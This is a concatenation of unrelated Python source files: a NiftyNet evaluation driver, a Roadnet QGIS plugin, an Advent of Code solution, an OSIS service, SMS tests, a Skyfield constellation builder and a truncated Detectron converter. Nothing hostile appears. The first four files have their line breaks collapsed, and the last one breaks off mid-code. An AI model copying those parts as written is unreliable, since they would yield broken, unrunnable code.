# -*- coding: utf-8 -*- """ This module defines a general procedure for running evaluations Example usage: app_driver = EvaluationApplicationDriver() app_driver.initialise_application(system_param, input_data_param) app_driver.run_application() system_param and input_data_param should be generated using: niftynet.utilities.user_parameters_parser.run() """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import time import itertools import pandas as pd import tensorflow as tf from niftynet.engine.application_factory import ApplicationFactory from niftynet.io.misc_io import touch_folder from niftynet.io.image_sets_partitioner import ImageSetsPartitioner FILE_PREFIX = 'model.ckpt' class EvaluationApplicationDriver(object): """ This class represents the application logic for evaluating a set of results inferred within NiftyNet (or externally generated) """ def __init__(self): self.app = None self.model_dir = None self.summary_dir = None self.session_prefix = None self.outputs_collector = None self.gradients_collector = None def initialise_application(self, workflow_param, data_param): """ This function receives all parameters from user config file, create an instance of application. :param workflow_param: a dictionary of user parameters, keys correspond to sections in the config file :param data_param: a dictionary of input image parameters, keys correspond to data properties to be used by image_reader :return: """ try: system_param = workflow_param.get('SYSTEM', None) net_param = workflow_param.get('NETWORK', None) infer_param = workflow_param.get('INFERENCE', None) eval_param = workflow_param.get('EVALUATION', None) app_param = workflow_param.get('CUSTOM', None) except AttributeError: tf.logging.fatal('parameters should be dictionaries') raise self.num_threads = 1 # self.num_threads = max(system_param.num_threads, 1) # self.num_gpus = system_param.num_gpus # set_cuda_device(system_param.cuda_devices) # set output TF model folders self.model_dir = touch_folder( os.path.join(system_param.model_dir, 'models')) self.session_prefix = os.path.join(self.model_dir, FILE_PREFIX) assert infer_param, 'inference parameters not specified' # create an application instance assert app_param, 'application specific param. not specified' self.app_param = app_param app_module = ApplicationFactory.create(app_param.name) self.app = app_module(net_param, infer_param, system_param.action) self.eval_param = eval_param data_param, self.app_param = \ self.app.add_inferred_output(data_param, self.app_param) # initialise data input data_partitioner = ImageSetsPartitioner() # clear the cached file lists data_partitioner.reset() if data_param: data_partitioner.initialise( data_param=data_param, new_partition=False, ratios=None, data_split_file=system_param.dataset_split_file) # initialise data input self.app.initialise_dataset_loader(data_param, self.app_param, data_partitioner) self.app.initialise_evaluator(eval_param) def run(self, application): """ This is the main application logic for evaluation. Computation of all metrics for all subjects is delegated to an Evaluator objects owned by the application object. The resulting metrics are aggregated as defined by the evaluation classes and output to one or more csv files (based on their 'group_by' headings). For example, per-subject metrics will be in one file, per-label-class metrics will be in another and per-subject-per-class will be in a third. 
:return: """ start_time = time.time() try: if not os.path.exists(self.eval_param.save_csv_dir): os.makedirs(self.eval_param.save_csv_dir) # iteratively run the graph all_results = application.evaluator.evaluate() for group_by, data_frame in all_results.items(): if group_by == (None,): csv_id = '' else: csv_id = '_'.join(group_by) with open(os.path.join(self.eval_param.save_csv_dir, 'eval_' + csv_id + '.csv'), 'w') as csv: csv.write(data_frame.reset_index().to_csv(index=False)) except KeyboardInterrupt: tf.logging.warning('User cancelled application') except RuntimeError: import sys import traceback exc_type, exc_value, exc_traceback = sys.exc_info() traceback.print_exception( exc_type, exc_value, exc_traceback, file=sys.stdout) finally: tf.logging.info('Cleaning up...') tf.logging.info( "%s stopped (time in second %.2f).", type(application).__name__, (time.time() - start_time))
# -*- coding: utf-8 -*- """ /*************************************************************************** Roadnet A QGIS plugin Roadnet is a plugin used for maintaining a local street gazetteer. ------------------- begin : 2014-12-09 git sha : $Format:%H$ copyright : (C) 2014 by thinkWhere email : [email protected] ***************************************************************************/ /*************************************************************************** * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Free Software Foundation; either version 2 of the License, or * * (at your option) any later version. * * * ***************************************************************************/ """ import os from PyQt4.QtCore import * from PyQt4.QtGui import ( QMessageBox, QPixmap, QIcon, QDesktopServices) from PyQt4.QtSql import QSqlDatabase from qgis.utils import * from qgis.core import * from esu_selector_tool import EsuSelectorTool from roadnet_dialog import ( AdminMetadataDlg, ChPwdDlg, AboutDlg, ExportLsgDlg, ExportLsgShapefileDlg, ExportPolyDlg, ExportsLorDlg, ExportsSwrfDlg, LsgLookupDlg, SrwrLookupDlg, StreetBrowserDlg, StreetReportsDlg, ValidationDlg) from generic_functions import ipdb_breakpoint from street_browser.street_browser import StreetBrowser from exports.exports import ( ExportDTF, ExportSRWR, ExportLOR, ExportLsgShp, ExportPoly) from admin.admin_menu import ExportStreetReport from admin.metadata import Metadata from admin.lsg_lookup import LsgLookUp from admin.srwr_lookup import SrwrLookup from admin.validation import Validation from admin.update_symbology import UpdateSymbology from gui.toolbar import RoadnetToolbar from geometry.esu_edit_handler import EsuEditHandler from geometry.rdpoly_edit_handler import RdpolyEditHandler from rn_menu.change_pwd import ChangePwd from rn_menu.about import About from ramp.ramp import Ramp import config import database import login import params_and_settings import roadnet_exceptions as rn_except import vector_layers __author__ = 'matthew.walsh' class Roadnet: """ QGIS plugin for managing street gazetteer data. thinkWhere 2015. """ def __init__(self, iface): """ Connect the plugin to the QGIS interface. This code is run every time that QGIS boots. :param iface: QGIS interface :return: """ if config.DEBUG_MODE: print('DEBUG_MODE: Roadnet.__init__ called') self.iface = iface # Save reference to the QGIS interface self.canvas = self.iface.mapCanvas() self.plugin_dir = os.path.dirname(__file__) self.clean_rdpoly = None self.db = None self.esu = None self.model = None self.rdpoly = None self.roadnet_started = False self.selector_tool = None self.street_browser = None self.street_browser_dk = None self.toolbar = None # Setup params file params_file_path = os.path.join(self.plugin_dir, 'Params.xml') self.params_file_handler = params_and_settings.ParamsFileHandler(params_file_path) try: self.params_file_handler.validate_params_file() except rn_except.QMessageBoxWarningError: # Parent of two different Params errors return self.params = self.params_file_handler.read_to_dictionary() # Connect to Ramp self.ramp = Ramp(self) def initGui(self): """ Set up the GUI components. This code is only run when the plugin has been activated in the plugin manager. :return: """ if config.DEBUG_MODE: print('DEBUG_MODE: initGui called') self.init_toolbar() self.toolbar.set_state('init') def start_roadnet(self): """ Start the plugin. 
Log in the user, connect to database, load layers, set toolbar up appropriately. """ if config.DEBUG_MODE: print('DEBUG_MODE: Starting roadNet') # Check the database if (self.params['RNDataStorePath'] == '') or (self.params['DbName'] == ''): if not self.run_change_db_path(): return db_path = os.path.join(self.params['RNDataStorePath'], self.params['DbName']) try: database.check_file(db_path) except IOError: if not self.run_change_db_path(): return # Log the user in login.login_and_get_role(self.params) self.toolbar.set_state(self.params['role']) if self.params['role'] == 'init': return # Open database and model self.db = database.open_working_copy(self.params) # params knows role database.update_geometry_statistics(self.db) self.model = database.get_model(self.db) # Add layers + connect edit signals, zoom to rdpoly self.add_rdpoly_layer() # Layer added as self.rdpoly self.add_esu_layer() # Layer added as self.esu + selector tool init self.params['session_includes_edits'] = False # Create the street browser instance if config.DEBUG_MODE: print('DEBUG_MODE: Initialising street browser') self.street_browser_dk = StreetBrowserDlg(self.params) self.street_browser_dk.setWindowFlags(Qt.WindowMaximizeButtonHint | Qt.WindowMinimizeButtonHint) rn_icon = QIcon() rn_icon.addPixmap(QPixmap(os.path.join(self.plugin_dir, "image", "rn_logo_v2.png"))) self.street_browser_dk.setWindowIcon(rn_icon) self.street_browser = StreetBrowser(self.iface, self.street_browser_dk, self.model, self.db, self.params) self.disable_srwr() # Hide SRWR tab self.street_browser.set_buttons_initial_state(self.params['role']) if config.DEBUG_MODE: print('DEBUG_MODE: Initialising street selector tool') # Initialise selector tool self.selector_tool = EsuSelectorTool(self.street_browser_dk, self.iface, self.esu, self.toolbar, self.db, self.street_browser.mapper) # Start RAMP if self.params['RAMP'] == 'true': self.ramp.start_ramp() self.roadnet_started = True def stop_roadnet(self): """ Stop the plugin. Close windows, disconnect and save databases, reset toolbars to initial state. 
""" if config.DEBUG_MODE: print('DEBUG_MODE: Stopping roadNet') # Stop RAMP, then reinitialise if self.ramp.ramp_started: self.ramp.stop_ramp() self.ramp = Ramp(self) # Unset the street selector and reset toolbar if self.iface.mapCanvas().mapTool(): # Tool is None if roadNet just stopped current_tool = self.iface.mapCanvas().mapTool().toolName() if current_tool == "ESU SELECTOR": self.selector_tool.unset_map_tool() # Reinitialise toolbar to reflect changes in RAMP settings self.toolbar.toolbar = None # Delete previous toolbar instance self.init_toolbar() # Remove layers for vlayer in [self.esu, self.rdpoly]: vlayer.layerDeleted.disconnect() # Disconnect auto-reload signal try: vector_layers.remove_spatialite_layer(vlayer, self.iface) except rn_except.RemoveNonExistentLayerPopupError: pass self.esu = None self.rdpoly = None # Reset street browser and other components self.street_browser_dk.close() self.street_browser_dk = None self.street_browser = None self.model = None # Disconnect database, and save if necessary connection_name = self.db.connectionName() self.db.close() self.db = None QSqlDatabase.removeDatabase(connection_name) if not config.DEBUG_MODE: database.update_sqlite_files(self.params) # Update params file self.params_file_handler.update_xml_file(self.params) self.roadnet_started = False def tr(self, message): return QCoreApplication.translate('Roadnet', message) def init_toolbar(self): # toolbar init if self.params['RAMP'] == 'true': with_ramp_flag = True else: with_ramp_flag = False self.toolbar = RoadnetToolbar(self.iface, self.plugin_dir, with_ramp_flag) # Roadnet tools self.toolbar.start_rn.triggered.connect(lambda: self.start_roadnet()) self.toolbar.stop_rn.triggered.connect(lambda: self.stop_roadnet()) self.toolbar.street_sel_btn.triggered.connect(self.activate_esu_selector) self.toolbar.sb_btn.triggered.connect(self.run_sb) self.toolbar.change_db_path.triggered.connect(self.run_change_db_path) self.toolbar.create_restore.triggered.connect(self.run_db_restore_point) self.toolbar.change_pwd.triggered.connect(self.run_change_pwd) self.toolbar.about.triggered.connect(self.run_about) self.toolbar.settings.triggered.connect(self.run_settings) # help menu self.toolbar.help.triggered.connect(self.run_help) # export menu self.toolbar.exp_lgs.triggered.connect(self.run_lsg_exp) self.toolbar.exp_srwr.triggered.connect(self.run_srwr_exp) self.toolbar.exp_list_roads.triggered.connect(self.run_lor_exp) self.toolbar.exp_maintain_poly.triggered.connect(self.run_export_poly) self.toolbar.exp_lsg_shp.triggered.connect(self.run_export_esu) # Admin tools self.toolbar.street_rpt.triggered.connect(self.run_street_report) self.toolbar.meta_menu.triggered.connect(self.run_metadata) self.toolbar.edit_lsg_lu.triggered.connect(self.run_lsg_lookup) self.toolbar.edit_srwr_lu.triggered.connect(self.run_srwr_lookup) self.toolbar.validation_rpt.triggered.connect(self.run_validation) self.toolbar.clean_rdpoly.triggered.connect(self.run_clean_rdpoly_symbology) # RAMP items if self.params['RAMP'] == 'true': self.toolbar.mcl_auto_number_btn.triggered.connect(self.ramp.run_mcl_auto_number) self.toolbar.mcl_select_btn.triggered.connect(self.ramp.run_ramp_mcl_select) self.toolbar.rdpoly_select_btn.triggered.connect(self.ramp.run_ramp_rdpoly_select) self.toolbar.load_layers.triggered.connect(self.ramp.run_ramp_load_layers) self.toolbar.road_length.triggered.connect(self.ramp.run_ramp_road_length) self.toolbar.export_wdm.triggered.connect(self.ramp.run_ramp_export_wdm) def activate_esu_selector(self): """ Fire 
on esu selector button. Sets reference to ESU Graphic layer and activates the street selector tool. """ self.iface.setActiveLayer(self.esu) self.iface.mapCanvas().setMapTool(self.selector_tool) def unload(self): """ Removes the plugin menu item and sb_icon from QGIS GUI """ if config.DEBUG_MODE: print('DEBUG_MODE: unload called') lock_file = os.path.join(self.params['RNDataStorePath'], 'RNLock') if os.path.isfile(lock_file): os.remove(lock_file) if self.roadnet_started: self.stop_roadnet() if self.toolbar: # No toolbar exists if Params file was missing self.toolbar.toolbar = None def run_db_restore_point(self): """ Saves a copy of the working database as <database>_restore.sqlite. :return: void """ database.db_restore_point(self.params) def run_change_db_path(self): """ function that shows the db path change dialog window :return: [bool] True if the user clicks on OK, False if on Cancel """ return database.change_db_path(self.params, self.params_file_handler) def run_change_pwd(self): """ function that changes the access password for the current user :return: """ self.change_pwd_dlg = ChPwdDlg() change_pwd = ChangePwd(self.change_pwd_dlg, self.iface, self.db, self.plugin_dir, self.params) self.change_pwd_dlg.exec_() del change_pwd def run_about(self): """ function that shows the about window with information on plug-in version copyright and licensing """ about_dlg = AboutDlg() about_dlg.setWindowFlags(Qt.CustomizeWindowHint | Qt.WindowTitleHint) about = About(about_dlg, self.plugin_dir) about_dlg.exec_() del about def run_sb(self): """ Shows the street browser dialog window, if its already visible then raise to front and give focus. """ self.street_browser_dk.signals.closed_sb.connect(self.street_browser.remove_coords) if self.street_browser_dk.isVisible(): self.street_browser_dk.activateWindow() if self.street_browser_dk.isMinimized(): self.street_browser_dk.showNormal() else: self.street_browser_dk.show() def run_lsg_exp(self): """ function that shows the export LSG dialog window """ self.export_lsg_dk = ExportLsgDlg() self.export_lsg = ExportDTF(self.iface, self.export_lsg_dk, self.params, self.db) self.export_lsg_dk.exec_() def run_srwr_exp(self): """ function that shows the export SRWR dialog window """ self.export_swrf_dk = ExportsSwrfDlg() self.export_srwr = ExportSRWR(self.iface, self.export_swrf_dk, self.params, self.db) self.export_swrf_dk.exec_() def run_lor_exp(self): """ function that shows the export list of roads dialog window """ self.export_lor_dk = ExportsLorDlg() self.export_lor = ExportLOR(self.iface, self.export_lor_dk, self.db) self.export_lor_dk.exec_() def run_export_esu(self): """ function that exports ESU streets line layer """ self.iface.setActiveLayer(self.esu) self.export_lsg_shp_dk = ExportLsgShapefileDlg() self.export_lsg_shp = ExportLsgShp(self.iface, self.export_lsg_shp_dk, self.db, self.params) self.export_lsg_shp_dk.exec_() def run_export_poly(self): """ function that exports polygons layer :return: """ self.iface.setActiveLayer(self.rdpoly) self.export_polgons_dk = ExportPolyDlg() self.export_poly = ExportPoly(self.iface, self.export_polgons_dk, self.db) self.export_polgons_dk.exec_() def run_street_report(self): """ function that shows the run street report dialog window """ self.street_reports_dlg = StreetReportsDlg() self.export_street_reports = ExportStreetReport( self.iface, self.db, self.street_reports_dlg, self.params) self.street_reports_dlg.exec_() def run_metadata(self): """ Initialise and display the metadata information window :return: """ # 
Initialise metadata each time dialog is launched self.admin_metadata_dlg = AdminMetadataDlg() self.metadata = Metadata(self.iface, self.db, self.admin_metadata_dlg, self.params) self.admin_metadata_dlg.show() def run_lsg_lookup(self): """ Open the LSG lookup definition dialog window :return: """ self.lsg_lookup_dlg = LsgLookupDlg() self.lsg_lookup = LsgLookUp(self.iface, self.db, self.lsg_lookup_dlg) self.lsg_lookup_dlg.show() def run_srwr_lookup(self): """ Open the SRWR lookup definition dialog window """ self.srwr_lookup_dlg = SrwrLookupDlg() self.srwr_lookup = SrwrLookup(self.iface, self.db, self.srwr_lookup_dlg) self.srwr_lookup_dlg.exec_() def run_validation(self): """ function that runs the validation report window :return: """ self.validation_dlg = ValidationDlg() self.validation = Validation(self.iface, self.db, self.validation_dlg, self.plugin_dir, self.params) self.validation_dlg.exec_() def run_clean_rdpoly_symbology(self): """ Run the road polygon symbology cleanup tool. :return: """ self.clean_rdpoly = UpdateSymbology(self.db, self.rdpoly, self.esu) self.clean_rdpoly.show_symbology_dlg() def run_help(self): """ Open the help pdf in the default web browser """ help = QDesktopServices() help_url = QUrl("http://www.thinkwhere.com/index.php/download_file/240/") if not help.openUrl(help_url): no_browser_msg_box = QMessageBox(QMessageBox.Warning, " ", "roadNet cannot find a web browser " "to open the help page", QMessageBox.Ok, None) no_browser_msg_box.setWindowFlags(Qt.CustomizeWindowHint | Qt.WindowTitleHint) no_browser_msg_box.exec_() return def run_settings(self): """ Show the settings dialog """ updated_params = params_and_settings.update_via_dialog(self.params) self.params_file_handler.update_xml_file(updated_params) def disable_srwr(self): """ Initially make the SRWR tab invisible. """ self.street_browser_dk.ui.srwrRecordsGroupBox.setVisible(False) def add_rdpoly_layer(self): """ Load Road Polygon layer from spatialite file. Connect triggers for editing, and so they can reload themselves if removed. """ if config.DEBUG_MODE: print("DEBUG_MODE: Adding Road Polygon layer.") self.rdpoly = vector_layers.add_styled_spatialite_layer( 'rdpoly', 'Road Polygons', self.params['working_db_path'], self.iface, style='rdpoly') self.rdpoly.editingStarted.connect(self.editing_rdpoly_begin) self.rdpoly.editingStopped.connect(self.editing_rdpoly_end) self.rdpoly.layerDeleted.connect(self.add_rdpoly_layer) def add_esu_layer(self): """ Load ESU layer from spatialite file. Connect triggers for editing, and so they can reload themselves if removed. 
""" if config.DEBUG_MODE: print("DEBUG_MODE: Adding ESU layer.") self.esu = vector_layers.add_styled_spatialite_layer( 'esu', 'ESU Graphic', self.params['working_db_path'], self.iface, style='esu') self.esu.editingStarted.connect(self.editing_esu_begin) self.esu.editingStopped.connect(self.editing_esu_end) self.esu.layerDeleted.connect(self.add_esu_layer) # Reload if removed # Create the selector tool instance if self.roadnet_started: if config.DEBUG_MODE: print('DEBUG_MODE: Re-initialising street selector tool') # Recreate selector tool self.selector_tool = EsuSelectorTool(self.street_browser_dk, self.iface, self.esu, self.toolbar, self.db, self.street_browser.mapper) def editing_esu_begin(self): """ Creates classes that listen for various edit events on the Esu layer """ if self.params['AutoSplitESUs'] == 'true': handle_intersect_flag = True else: handle_intersect_flag = False # Disable attributes dialog QSettings().setValue( '/qgis/digitizing/disable_enter_attribute_values_dialog', True) self.esu_edit_handler = EsuEditHandler( self.iface, self.esu, self.db, self.params, handle_intersect_flag) def editing_esu_end(self): self.esu_edit_handler = None self.params['session_includes_edits'] = True # Re-enable attributes dialog QSettings().setValue( '/qgis/digitizing/disable_enter_attribute_values_dialog', False) if self.esu.isEditable() is True: # Rolling back changes ends destroys geometry_handler class but # layer remains editable. In this case, recreate it. self.editing_esu_begin() def editing_rdpoly_begin(self): if self.params['PreventOverlappingPolygons'] == 'true': handle_intersect_flag = True else: handle_intersect_flag = False # Disable attributes dialog QSettings().setValue( '/qgis/digitizing/disable_enter_attribute_values_dialog', True) self.rdpoly_edit_handler = RdpolyEditHandler( self.iface, self.rdpoly, self.db, self.params, handle_intersect_flag) def editing_rdpoly_end(self): self.rdpoly_edit_handler = None self.params['session_includes_edits'] = True # Re-enable attributes dialog QSettings().setValue( '/qgis/digitizing/disable_enter_attribute_values_dialog', False) if self.rdpoly.isEditable() is True: # Rolling back changes ends destroys geometry_handler class but # layer remains editable. In this case, recreate it. self.editing_rdpoly_begin() def get_multiple_part_esus(self): """ Helper function, not used in roadNet, that can be called manually to list ESUs whose geometries have more than one part. :return: list of esu ids """ esu_ids = [] for f in self.esu.getFeatures(): g = QgsGeometry(f.geometry()) # Make a copy if g.deletePart(1): esu_ids.append(f['esu_id']) return esu_ids
""" Solution to Day 14 from: http://adventofcode.com/2016/day/14 --- Day 14: One-Time Pad --- In order to communicate securely with Santa while you're on this mission, you've been using a one-time pad that you generate using a pre-agreed algorithm. Unfortunately, you've run out of keys in your one-time pad, and so you need to generate some more. To generate keys, you first get a stream of random data by taking the MD5 of a pre-arranged salt (your puzzle input) and an increasing integer index (starting with 0, and represented in decimal); the resulting MD5 hash should be represented as a string of lowercase hexadecimal digits. However, not all of these MD5 hashes are keys, and you need 64 new keys for your one-time pad. A hash is a key only if: It contains three of the same character in a row, like 777. Only consider the first such triplet in a hash. One of the next 1000 hashes in the stream contains that same character five times in a row, like 77777. Considering future hashes for five-of-a-kind sequences does not cause those hashes to be skipped; instead, regardless of whether the current hash is a key, always resume testing for keys starting with the very next hash. For example, if the pre-arranged salt is abc: The first index which produces a triple is 18, because the MD5 hash of abc18 contains ...cc38887a5.... However, index 18 does not count as a key for your one-time pad, because none of the next thousand hashes (index 19 through index 1018) contain 88888. The next index which produces a triple is 39; the hash of abc39 contains eee. It is also the first key: one of the next thousand hashes (the one at index 816) contains eeeee. None of the next six triples are keys, but the one after that, at index 92, is: it contains 999 and index 200 contains 99999. Eventually, index 22728 meets all of the criteria to generate the 64th key. So, using our example salt of abc, index 22728 produces the 64th key. Given the actual salt in your puzzle input, what index produces your 64th one-time pad key? """ import hashlib import re def generates_key(salt, index): """Returns true if the hash of salt and the index contains one character three times in a row, and one of the next 1000 hashes with the same salt and an increasing index contains the same character five times in a row""" starting_hash = hashlib.md5(str.encode(salt + str(index))).hexdigest() match = re.search(r'([a-z0-9])\1\1', starting_hash) if match is None: return False repeat_target = match[1] + match[1] + match[1] + match[1] + match[1] for i in range(index + 1, index + 1001): new_hash = hashlib.md5(str.encode(salt + str(i))).hexdigest() if repeat_target in new_hash: return True return False def main(): """Execution of solution""" salt = 'abc' index = 0 key_count = 0 while key_count < 64: if generates_key(salt, index): key_count += 1 index += 1 print(index - 1) if __name__ == "__main__": main()
##############################################################################
#
#    OSIS stands for Open Student Information System. It's an application
#    designed to manage the core business of higher education institutions,
#    such as universities, faculties, institutes and professional schools.
#    The core business involves the administration of students, teachers,
#    courses, programs and so on.
#
#    Copyright (C) 2015-2020 Université catholique de Louvain (http://www.uclouvain.be)
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#    GNU General Public License for more details.
#
#    A copy of this license - GNU General Public License - is available
#    at the root of the source code of this program. If not,
#    see http://www.gnu.org/licenses/.
#
##############################################################################
from typing import List

from django.db import transaction

from program_management.ddd.command import PostponeProgramTreeCommand, CopyProgramTreeToNextYearCommand
from program_management.ddd.domain.program_tree import ProgramTreeIdentity
from program_management.ddd.domain.service.calculate_end_postponement import CalculateEndPostponement
from program_management.ddd.repositories import program_tree_version as tree_version_repo
from program_management.ddd.service.write import copy_program_tree_service


@transaction.atomic()
def postpone_program_tree(
        postpone_cmd: 'PostponeProgramTreeCommand'
) -> List['ProgramTreeIdentity']:
    identities_created = []

    # GIVEN
    from_year = postpone_cmd.from_year
    end_postponement_year = CalculateEndPostponement.calculate_end_postponement_year_program_tree(
        identity=ProgramTreeIdentity(code=postpone_cmd.from_code, year=postpone_cmd.from_year),
        repository=tree_version_repo.ProgramTreeVersionRepository()
    )

    # WHEN
    while from_year < end_postponement_year:
        identity_next_year = copy_program_tree_service.copy_program_tree_to_next_year(
            copy_cmd=CopyProgramTreeToNextYearCommand(
                code=postpone_cmd.from_code,
                year=from_year,
            )
        )

        # THEN
        identities_created.append(identity_next_year)
        from_year += 1

    return identities_created
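# Usage sketch (illustrative only; 'LTEST100A' and 2020 are placeholder values
# for a program tree code and its starting academic year, and the keyword
# names assume the command is a simple DTO exposing from_code/from_year):
#
#     cmd = PostponeProgramTreeCommand(from_code='LTEST100A', from_year=2020)
#     identities = postpone_program_tree(cmd)   # one identity per copied year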
# -*- coding: utf-8 -*-
'''SMS tests.'''
from dci_notify.extensions import mail
from dci_notify.sms import split_msg, send_sms


class TestSplitMessage:

    def test_split_msg_one_chunk(self):
        msg = 'a' * 130
        chunks = split_msg(msg)
        assert len(chunks) == 1

    def test_split_msg_multi_chunk(self):
        msg = 'a' * 500
        chunks = split_msg(msg)
        assert len(chunks) == 4

    def test_split_msg_line_breaks(self):
        msg = 'a' * 120 + '\n' + 'b' * 40
        chunks = split_msg(msg)
        assert len(chunks) == 2
        assert len(chunks[0]) == 120

    def test_split_msg_one_line(self):
        msg = 'a' * 160 + 'b' * 20
        chunks = split_msg(msg)
        assert len(chunks) == 2


class TestSendMessage:

    def test_send_sms_single_message(self, app):
        with mail.record_messages() as outbox:
            send_sms(carrier='verizon', number=5551112222,
                     message='message', subject='subject')
            assert len(outbox) == 1
            assert outbox[0].subject == 'subject'
            assert outbox[0].body == 'message'

    def test_send_sms_multiple_messages(self, app):
        with mail.record_messages() as outbox:
            send_sms(carrier='verizon', number=5551112222,
                     message='m' * 300, subject='subject')
            assert len(outbox) == 3
            assert outbox[0].subject == 'subject'
            assert outbox[0].body == 'm' * 130

    def test_send_sms_with_conn(self, app):
        with mail.record_messages() as outbox:
            with mail.connect() as conn:
                send_sms(carrier='verizon', number=5551112222,
                         message='m' * 300, subject='subject',
                         conn=conn)
            assert len(outbox) == 3
#!/usr/bin/env python3 """Build Skyfield's internal table of constellation boundaries. See: https://iopscience.iop.org/article/10.1086/132034/pdf http://cdsarc.u-strasbg.fr/viz-bin/Cat?VI/42 """ import argparse import os import sys import numpy as np from numpy import array, searchsorted from skyfield import api URL = 'http://cdsarc.u-strasbg.fr/ftp/VI/42/data.dat' def main(): with api.load.open(URL) as f: lines = list(f) unique_ra = set() unique_dec = set() fracs = set() boundaries = [] for line in lines: fields = line.split() ra_low = extend(fields[0]) ra_up = extend(fields[1]) de_low = extend(fields[2]) const = fields[3].decode('ascii') print(ra_low, const) #print(ra_int(ra_low)) #fracs.add(fields[0].split(b'.')[1]) unique_ra.add(ra_low) unique_ra.add(ra_up) unique_dec.add(de_low) fracs.add(const) boundaries.append([ra_low, ra_up, de_low, const]) print(sorted(fracs)) print('constellations:', len(fracs)) print('unique_ra:', len(unique_ra)) print('unique_dec:', len(unique_dec)) sorted_consts = array(sorted(fracs)) sorted_ra = array(sorted(unique_ra)) sorted_dec = array(sorted(unique_dec)) assert sorted_ra[0] == 0 assert sorted_ra[-1] == 24 assert sorted_dec[0] == -90 assert sorted_dec[-1] == 88 sorted_ra = sorted_ra[1:] sorted_dec = sorted_dec[1:] print('bytes', sorted_ra.nbytes) print('bytes', sorted_dec.nbytes) #grid = [[5] * len(unique_dec)] * len(unique_ra) #grid = array(grid, 'i1') row = [-128] * len(sorted_ra) grid = [] i = 0 de = -90.0 for ra_low, ra_up, de_low, const in boundaries[::-1]: if de_low > de: grid.append(row) row = list(row) de = de_low i0 = searchsorted(sorted_ra, ra_low, side='right') i1 = searchsorted(sorted_ra, ra_up, side='right') c = searchsorted(sorted_consts, const) # if ra_up == 24.0: # print(sorted_ra, ra_low, ra_up) # print(i0, i1, '?', len(row)) # exit() for j in range(i0, i1): row[j] = c grid.append(row) grid.append(row) grid.append(row) #grid = grid[::-1] grid = array(grid, 'i1').T assert len(sorted_ra) == 236 assert searchsorted(sorted_ra, 0, side='right') == 0 assert searchsorted(sorted_ra, 0.06, side='right') == 0 assert searchsorted(sorted_ra, 0.07, side='right') == 1 assert searchsorted(sorted_ra, 23.8, side='right') == 234 assert searchsorted(sorted_ra, 23.9, side='right') == 235 assert searchsorted(sorted_ra, 24.0, side='right') == 236 sorted_ra = sorted_ra[:-1] assert len(sorted_ra) == 235 assert searchsorted(sorted_ra, 0) == 0 assert searchsorted(sorted_ra, 0.06) == 0 assert searchsorted(sorted_ra, 0.07) == 1 assert searchsorted(sorted_ra, 23.8) == 234 assert searchsorted(sorted_ra, 23.9) == 235 assert searchsorted(sorted_ra, 24.0) == 235 print(sorted_consts[57]) print(grid) print('shape', grid.shape) print('bytes', grid.nbytes) for ra, dec in [(0, 0), (0.1, 0.1), (5.59, -5.45), (16, 80), (16, 90), (16, -90), (24, 360), ([0, 16], [0, 80])]: c = compute_constellation(ra, dec, sorted_ra, sorted_dec, sorted_consts, grid) print('=', ra, dec, c) path = os.path.dirname(__file__) + '/../skyfield/data/constellations' np.savez_compressed( path, sorted_ra=sorted_ra, sorted_dec=sorted_dec, radec_to_index=grid, indexed_abbreviations=sorted_consts, ) def compute_constellation(ra, dec, sorted_ra, sorted_dec, sorted_consts, grid): i = searchsorted(sorted_ra, ra) j = searchsorted(sorted_dec, dec) #print(dec, sorted_dec) #print(ra, sorted_ra) print("ra,dec", ra, dec) print("i,j", i, j) return sorted_consts[grid[i, j]] def extend(s): """Return a float for `s` extended to machine precision. 
Takes a string like '13.6667', passes it to `float()`, and snaps it to the nearest whole second. """ return round(3600 * float(s)) / 3600. # Some discarded code that I might want to revive someday: how to grow # and shrink a list of segments as new ones supersede old ones on the # way down the sky. def segment_experiment(): assert insert_segment([0, 4, 7, 10], 0, 3) == [0, 3, 4, 7, 10] assert insert_segment([0, 4, 7, 10], 4, 7) == [0, 4, 7, 10] assert insert_segment([0, 4, 7, 10], 6, 9) == [0, 4, 6, 9, 10] assert insert_segment([0, 4, 7, 10], 7, 10) == [0, 4, 7, 10] assert insert_segment([0, 4, 7, 10], 0, 10) == [0, 10] assert insert_segment([0, 10], 4, 7) == [0, 4, 7, 10] assert insert_segment([], 4, 7) == [4, 7] segments = [] n = 0 for ra_low, ra_up, de_low in boundaries[::-1]: segments = insert_segment(segments, ra_low, ra_up) print(len(segments), end=' ') n += len(segments) print(n) def insert_segment(ra_list, ra_low, ra_up): new = [] i = 0 while i < len(ra_list) and ra_list[i] < ra_low: new.append(ra_list[i]) i += 1 new.append(ra_low) new.append(ra_up) while i < len(ra_list) and ra_list[i] <= ra_up: i += 1 while i < len(ra_list): new.append(ra_list[i]) i += 1 return new if __name__ == '__main__': main()
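# Verification sketch (not part of the original script): the arrays written by
# np.savez_compressed() above can be loaded back and queried directly, mirroring
# compute_constellation(). The .npz path below is the one this script writes,
# and (5.59, -5.45) is one of the test positions used above (roughly the Orion
# Nebula), so 'Ori' is the expected abbreviation.
#
#     data = np.load('../skyfield/data/constellations.npz')
#     i = searchsorted(data['sorted_ra'], 5.59)
#     j = searchsorted(data['sorted_dec'], -5.45)
#     print(data['indexed_abbreviations'][data['radec_to_index'][i, j]])  # 'Ori'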
#!/usr/bin/env python # Copyright (c) 2017-present, Facebook, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ############################################################################## from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import argparse import h5py import json import os import imageio import sys import cityscapesscripts.evaluation.instances2dict_with_polygons as cs import detectron.utils.segms as segms_util import detectron.utils.boxes as bboxs_util def parse_args(): parser = argparse.ArgumentParser(description='Convert dataset') parser.add_argument( '--dataset', help="cocostuff, cityscapes", default=None, type=str) parser.add_argument( '--outdir', help="output dir for json files", default=None, type=str) parser.add_argument( '--datadir', 